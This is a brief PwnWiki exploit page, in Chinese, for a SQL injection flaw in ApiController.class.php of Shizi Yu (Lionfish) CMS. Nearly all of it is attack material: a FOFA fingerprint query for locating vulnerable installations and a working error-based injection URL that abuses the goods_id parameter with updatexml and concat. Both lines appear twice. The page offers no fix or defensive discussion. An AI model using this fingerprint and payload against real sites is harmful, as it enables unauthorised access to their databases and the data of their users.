獅子魚CMS ApiController.class.php SQL注入漏洞
From PwnWiki
FOFA
"/seller.php?s=/Public/login"
Payload
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)
"/seller.php?s=/Public/login"
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)